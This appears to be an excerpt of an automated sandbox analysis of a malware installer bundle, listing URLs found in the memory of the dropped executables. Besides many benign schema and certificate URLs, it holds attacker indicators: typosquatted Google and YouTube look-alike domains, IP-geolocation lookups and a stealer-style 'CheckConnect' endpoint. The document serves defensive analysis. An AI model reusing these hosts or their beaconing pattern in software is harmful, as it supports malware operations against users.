                  Source: setup_installer.exe, 00000001.00000003.1691383572.00000000031C9000.00000004.00001000.00020000.00000000.sdmp, Mon17c604381c7047e.exe, Mon17c604381c7047e.exe, 00000013.00000002.1994726155.00007FF72F6C6000.00000002.00000001.01000000.00000011.sdmp, Mon17c604381c7047e.exe, 00000013.00000000.1712308537.00007FF72F6C6000.00000002.00000001.01000000.00000011.sdmpString found in binary or memory: http://imgs.googlwaa.com/
                  Source: Mon17c604381c7047e.exe, 00000013.00000002.1988739257.000002D9EF585000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/
                  Source: Mon17c604381c7047e.exe, 00000013.00000002.1988739257.000002D9EF585000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/0
                  Source: Mon17c604381c7047e.exe, Mon17c604381c7047e.exe, 00000013.00000002.1988739257.000002D9EF526000.00000004.00000020.00020000.00000000.sdmp, Mon17c604381c7047e.exe, 00000013.00000002.1988739257.000002D9EF569000.00000004.00000020.00020000.00000000.sdmp, Mon17c604381c7047e.exe, 00000013.00000002.1988739257.000002D9EF54D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/
                  Source: Mon17c604381c7047e.exe, 00000013.00000002.1988739257.000002D9EF55F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com:80/json/
                  Source: Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.0000000002519000.00000004.00000800.00020000.00000000.sdmp, Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.000000000255E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://iplogger.org
                  Source: setup_installer.exe, 00000001.00000003.1691383572.0000000002F30000.00000004.00001000.00020000.00000000.sdmp, setup_install.exe, 00000002.00000002.1970006322.0000000064957000.00000008.00000001.01000000.00000007.sdmp, libwinpthread-1.dll.1.drString found in binary or memory: http://mingw-w64.sourceforge.net/X
                  Source: abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                  Source: Mon17eac6d534bfd22c7.exe, 0000000E.00000002.1820493066.0000000003E41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                  Source: explorer.exe, 0000002F.00000002.4175875048.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.4164547878.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000000.1908199562.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000000.1884635558.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                  Source: explorer.exe, 0000002F.00000002.4164547878.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000000.1884635558.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
                  Source: Mon17eac6d534bfd22c7.exe, 0000000E.00000002.1820493066.0000000003E41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                  Source: Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000037D1000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4159798486.0000000002761000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
                  Source: explorer.exe, 0000002F.00000000.1924696913.000000000CA42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.4185243177.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000003.3470387094.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000003.3108964724.000000000CA4B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.mi
                  Source: explorer.exe, 0000002F.00000000.1924696913.000000000CA42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.4185243177.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000003.3470387094.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000003.3108964724.000000000CA4B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.micr
                  Source: explorer.exe, 0000002F.00000002.4179044316.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000002F.00000000.1896067566.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000002F.00000002.4170915097.0000000007F40000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
                  Source: Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000037D1000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4159798486.0000000002761000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                  Source: Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000037D1000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4159798486.0000000002761000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                  Source: Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000037D1000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4159798486.0000000002761000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                  Source: Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000037D1000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4159798486.0000000002761000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
                  Source: Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000037D1000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4159798486.0000000002761000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                  Source: Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000037D1000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4159798486.0000000002761000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
                  Source: Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000037D1000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4159798486.0000000002761000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
                  Source: Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000037D1000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4159798486.0000000002761000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
                  Source: Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000037D1000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4159798486.0000000002761000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
                  Source: Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000037D1000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4159798486.0000000002761000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
                  Source: Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000037D1000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4159798486.0000000002761000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
                  Source: Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000037D1000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4159798486.0000000002761000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
                  Source: Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000037D1000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4159798486.0000000002761000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
                  Source: Mon178817e243.exe, 00000016.00000002.4158008324.0000000003141000.00000004.00000800.00020000.00000000.sdmp, Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.0000000002473000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000037D1000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4159798486.0000000002761000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possesspropertyx
                  Source: setup_installer.exe, 00000001.00000003.1691383572.00000000031C9000.00000004.00001000.00020000.00000000.sdmp, Mon17c604381c7047e.exe, Mon17c604381c7047e.exe, 00000013.00000002.1994726155.00007FF72F6C6000.00000002.00000001.01000000.00000011.sdmp, Mon17c604381c7047e.exe, 00000013.00000000.1712308537.00007FF72F6C6000.00000002.00000001.01000000.00000011.sdmp, Mon17c604381c7047e.exe, 00000013.00000002.1988739257.000002D9EF526000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://staticimg.youtuuee.com/
                  Source: setup_installer.exe, 00000001.00000003.1691383572.00000000031C9000.00000004.00001000.00020000.00000000.sdmp, Mon17c604381c7047e.exe, 00000013.00000002.1994726155.00007FF72F6C6000.00000002.00000001.01000000.00000011.sdmp, Mon17c604381c7047e.exe, 00000013.00000000.1712308537.00007FF72F6C6000.00000002.00000001.01000000.00000011.sdmpString found in binary or memory: http://staticimg.youtuuee.com/0sizeof0http://staticimg.youtuuee.com/loadhttp://staticimg.youtuuee.co
                  Source: Mon17c604381c7047e.exe, 00000013.00000002.1988739257.000002D9EF526000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://staticimg.youtuuee.com/bz
                  Source: Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000037D1000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4159798486.0000000002761000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                  Source: Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.00000000059B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/ICont
                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003EBF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000418B000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003DD0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003CDE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003B01000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D31000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003C8F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000409C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003C3F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BA0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003B50000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/ICont$
                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003EBF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000418B000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003DD0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003CDE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003B01000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D31000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003C8F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000409C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003C3F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BA0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003B50000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/ICont(
                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003EBF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000418B000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003DD0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003CDE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003B01000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D31000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003C8F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000409C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003C3F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BA0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003B50000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/ICont0
                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003EBF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000418B000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003DD0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003CDE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003B01000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D31000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003C8F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000409C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003C3F000.00000004.00000800.00020000.00000000.sdmp, 
Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BA0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003B50000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/ICont4
                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003EBF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000418B000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003DD0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003CDE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003B01000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D31000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003C8F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000409C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003C3F000.00000004.00000800.00020000.00000000.sdmp, 
Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BA0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003B50000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/ICont8
                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003EBF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000418B000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003DD0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003CDE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003B01000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D31000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003C8F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000409C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003C3F000.00000004.00000800.00020000.00000000.sdmp, 
Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BA0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003B50000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContD
                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003DD0000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.000000000590E000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContH
                  Source: Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.00000000059B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/
                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000418B000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003CDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/$
                  Source: Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/0
                  Source: Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006F4F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000385F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000071D7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000723A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003895000.00000004.00000800.00020000.00000000.sdmp, 
Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007016000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003B01000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003C8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/CheckConnect
